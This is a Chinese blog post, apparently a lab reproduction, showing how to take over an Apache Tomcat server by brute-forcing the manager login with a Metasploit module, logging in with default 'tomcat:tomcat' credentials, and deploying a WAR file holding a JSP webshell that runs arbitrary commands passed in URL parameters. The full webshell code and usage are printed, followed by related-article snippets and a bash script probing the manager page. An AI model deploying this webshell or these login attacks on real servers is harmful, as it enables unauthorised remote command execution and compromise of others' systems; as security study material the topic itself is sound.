Tomcat弱口令+war部署getshell

最新推荐文章于 2024-08-06 10:13:47 发布
原创 最新推荐文章于 2024-08-06 10:13:47 发布 · 271 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tomcat #jsp

影响版本

全版本

漏洞复现

msf爆破

use auxiliary/scanner/http/tomcat_mgr_login

设置IP和端口

set rhosts 10.7.10.41
set rport 8080(默认端口)

run运行
在这里插入图片描述

tomcat:tomcat

在这里插入图片描述
登陆成功
在这里插入图片描述
用大佬的jsp一句话马
在这里插入图片描述

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后把shell.jsp压缩成zip然后改后缀为1.war上传
在这里插入图片描述
访问地址:http://xxxxxx:8080/1/shell.jsp
传参pwd和i

?pwd=123&i=ls(执行命令)

在这里插入图片描述
QQ:3075999532

参考文章:
https://www.cnblogs.com/mke2fs/p/12718669.html
https://www.cnblogs.com/qianxinggz/p/13440366.html

Tomcat WAR部署getshell
aqi_sec的博客
07-06 2413
Tomcat WAR部署getshell
Tomcat后台上传wargetshell复现
一瓶草莓酱的博客
03-17 3993
环境搭建 页面浏览: 漏洞简介 tomcat是apache软件基金会的核心项目,tomcat服务器是个免费的开放源代码的web应用服务器,属于轻量级应用服务器。默认端口:8080 tomcat个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上,响应消息再通过tomcat返回给浏览器。 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 图中可以看到ma
Tomcat弱口令后台部署wargetshell
qq_59102311的博客
04-24 2914
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打包成war包。7.设置目标IP和目标端口。
vulhub复现之tomcat8.0.43弱口令&war远程部署漏洞复现
m0_70483044的博客
07-19 3266
学习时间2022.7.18日之计在于晨,年之计在于春。
Tomcat后台拿shell (war
blrk
02-20 2221
http://huaidan.org/archives/1207.html
【 漏洞复现 】Tomcat 后台弱口令部署wargetshell
qq_48368964的博客
08-06 872
tomcat8环境下默认进入后台的密码为 tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令
vulhub之tomcat弱口令+部署warGetShell
lionwerson的博客
04-04 664
1.拉取靶场镜像,打开靶场 2.登陆抓包进行爆破,设置个位置,然后选择类型为custom iterator,然后在下面payload选项中选择三个位置,然后增加编码的方式,最后定要取消勾选,在选项最下面的url编码特殊字符,否则就算爆出了弱口令也无法显示成功。 如果勾选了url编码特殊字符就会让生成的base64编码的结尾的等号被url编码,即使看到的payload正确,但是请求不正确,所以显示不成功。 密码是tomcat,用户名也是。 3.进入后台上传文件,然后getshel.
Tomcat弱口令进入后台部署wargetshell
weixin_50053818的博客
06-30 1250
文章目录环境docker+vuhub搭建环境爆破进入后台上传wargetshell 环境 vulhub docker-compose kali docker+vuhub搭建环境 通过git将vulhub仓库克隆到本地中。 ``` git clone https://github.com/vulhub/vulhub ``` 进入vulhub目录下的tomcat目录即可。 执行docker-compose up -d即可完成tomcat的搭建。 爆破进入后台 直接访问ip:port即可进入tomca
Tomcat7+ 弱口令 +后台getshell漏洞
m0_52701599的博客
02-17 801
Tomcat7+ 弱口令 && 后台getshell漏洞
Tomcat7+ 弱口令 && 后台getshell漏洞
weixin_45653478的博客
05-11 1290
Tomcat个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码。
tomcat 弱口令tomcat8】
向安全进发的博客
04-20 1328
Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问。 攻击条件:如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。==
Tomcat部署war
Rickwubaa的博客
02-17 222
Tomcat部署war
Tomcat页面弱口令war包上传Getshell
来到了学渣的博客
07-19 3170
思路 burpsuit对tomcat进行弱口令爆破→利用弱口令进入tomcat管理页面→制作war包上传getshell 在vulhub路径/vulhub/tomcat/tomcat8中启动tomcat环境 Tomcat默认页面登录管理在manager/html路径下 启动burpsuit抓包进行弱口令爆破 对Basic后面那段base64进行解码发现是这样的个格式 账号:密码 发送至爆破处 然后再选择encode编码 阿里云搭建漏洞环境跑爆破居然会ban掉自己ip。。。只能从虚拟机来
(最新)Tomcat弱口令-上传war包获取websehll漏洞复现
qq1140037586的博客
12-17 1841
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。登录成功后有上传点,上传压缩包 xxx.war的.war不会被解析,直接访问 xxx/xxx.jsp下的木马文件,拿到webshell。
[ 中间件漏洞 ] Tomcat 管理界面弱口令+war后门部署
weixin_30384217的博客
07-12 913
前言:   Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。 漏洞复现: 漏洞原理:   Tomcat后台管理界面的用户配置文件为conf目录下的tomcat-users.xml。   登录Tomcat的后台管理界面,上传war包 上传成功后,会自动将war包解压并...
【Vulfocus靶场-初级】Tomcat后台弱口令+War包文件上传Getshell漏洞复现
08-26 5266
Vulfocus靶场漏洞,Tomcat后台弱口令War包文件上传Getshell漏洞复现,利用冰蝎/哥斯拉进步方便命令执行,获得flag并提交,通过tomcat靶场。
src挖掘之Tomcat未授权弱口令+war后门上传
huangyongkang666的博客
07-18 3699
高危src挖掘
文件上传漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 3335
我相信,你在开发Web应用时,后端定会提供文件的上传功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上传入口。但是,你在做文件上传功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 4500
网站Getshell的方法
渗透vulnhub tomcat
最新发布
03-21
### 关于VulnHub上的Tomcat渗透测试教程与漏洞利用 #### 背景介绍 VulnHub是个提供虚拟机镜像的平台,用于安全研究人员和爱好者练习渗透测试技能。其中许多靶机都涉及Web应用的安全问题,而Apache Tomcat作为款流行的Java Servlet容器,在这些环境中经常被用作目标服务之。 在提到的具体案例中,Breach-1.0 和 My Tomcat Host 都包含了针对Tomcat服务器的相关攻击向量[^1][^2]。通过分析已有的实验记录可以发现几个常见的切入点: 1. **弱口令或默认配置** 很多情况下,默认安装的Tomcat实例会保留管理员账户(如`admin/admin`)或者未更改其他敏感设置。这使得攻击者能够轻松获取管理权限并部署恶意WAR文件[^3]。 2. **目录遍历/路径穿越漏洞** 如果存在错误编码逻辑,则可能允许远程用户访问受限资源甚至操作系统层面的数据存储位置[^1]。 3. **反序列化缺陷** Java应用程序特别容易受到此类威胁的影响,尤其是当它们依赖第三方库处理输入数据流时。例如Commons Collections组件就曾暴露出严重风险[CVE编号待补充],该问题可导致任意代码执行情况发生。 4. **JSP上传功能滥用** 当网站提供了文件上传接口却缺乏足够的验证机制来阻止非法扩展名提交的话,那么就可以尝试构造特制请求从而实现GetShell的目的. 以下是基于上述理论的个简单示例脚本用来演示如何自动化查找潜在易受攻击的服务端点: ```bash #!/bin/bash TARGET=$1 PORT=${2:-8080} if [[ -z "$TARGET" ]]; then echo "[!] Usage: $0 <target> [port]" exit 1 fi echo "[*] Checking target at http://${TARGET}:${PORT}/manager/html ..." curl --silent --insecure \ --user admin:password \ "http://${TARGET}:${PORT}/manager/html/list" | grep 'OK' && { echo "[+] Manager interface accessible!" } || { echo "[-] Unable to access manager page." } ``` 此脚本仅作为个基础框架展示目的,并不包含完整的业务逻辑判断以及防护措施规避等内容,请勿直接应用于实际环境当中! --- ### 实践建议 对于初学者而言,可以从以下几个方面入手学习: - 掌握基本Linux命令行操作技巧; - 学习Python/Bash等编程语言编写简单的工具辅助完成任务; - 熟悉Metasploit Framework及其插件生态系统; - 参考OWASP Top Ten了解当前主流web安全隐患分类标准; 最后提醒大家注意合法合规地开展研究活动,避免触犯法律法规造成不必要的麻烦。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值